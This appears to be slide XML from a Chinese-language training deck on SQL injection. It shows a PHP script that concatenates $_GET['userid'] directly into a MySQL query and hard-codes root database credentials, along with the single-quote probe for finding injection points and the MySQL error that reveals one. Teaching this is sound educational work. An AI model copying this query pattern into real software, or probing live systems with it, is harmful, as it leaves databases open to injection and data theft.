              <a:t>  echo</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$sql</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"&lt;br&gt;"</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$result</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$conn</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>query</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$sql</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AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  if</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$result</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0</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AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    while</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$row</a:t>
            </a:r>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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$result</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>fetch_assoc</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>      echo</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$row</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98658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0</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 "</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$row</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98658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</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 "</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01080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$row</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098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"&lt;br&gt;"</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>else</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"0 results"</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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021E763-AA40-5FB0-A1F5-C12302C0D8F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834283" y="1627552"/>
            <a:ext cx="4968552" cy="313496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参数后添加一个单引号，若存在注入点则通常会返回一个错误提示。</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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">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180CC6B-0CF2-1963-22E4-A7C25E267698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1105935"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135084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839416" y="110920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单引号法</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240016" y="1592001"/>
            <a:ext cx="5328592" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $servername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"localhost"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$username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"root"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$password</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"ningmeng"</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$dbname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"myDB"</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$conn</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00FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>new</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267F99"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mysqli</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$servername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$username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$password</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$dbname</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if</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connect_error</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die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"Connection failed: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connect_error</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endParaRPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $sql</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"select * from category where userid =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$_GET</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"userid"</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$result</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query</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$sql</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if</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$result</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num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0</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while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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$result</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fetch_assoc</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>      echo</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0</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1</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2</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"&lt;br&gt;"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F00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>echo</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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"0 results"</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $conn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close</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800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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021E763-AA40-5FB0-A1F5-C12302C0D8F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834283" y="1627552"/>
            <a:ext cx="4968552" cy="313496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参数后添加一个单引号，若存在注入点则通常会返回一个错误提示。</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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">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180CC6B-0CF2-1963-22E4-A7C25E267698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384032" y="1105935"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51333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839416" y="110920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单引号法</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240016" y="1592001"/>
            <a:ext cx="5328592" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $servername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"localhost"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$username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"root"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$password</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"ningmeng"</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$dbname</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"myDB"</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$conn</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00FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>new</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267F99"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mysqli</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$servername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$username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$password</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$dbname</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if</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connect_error</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die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"Connection failed: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connect_error</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endParaRPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $sql</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31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"select * from category where userid =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$_GET</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"userid"</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1080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $result</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$conn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query</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$sql</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if</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$result</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0</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AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    while</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001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$result</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fetch_assoc</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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>      echo</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0</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1</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 "</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01080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$row</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098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"&lt;br&gt;"</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0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>else</a:t>
            </a:r>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795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"0 results"</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000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  $conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
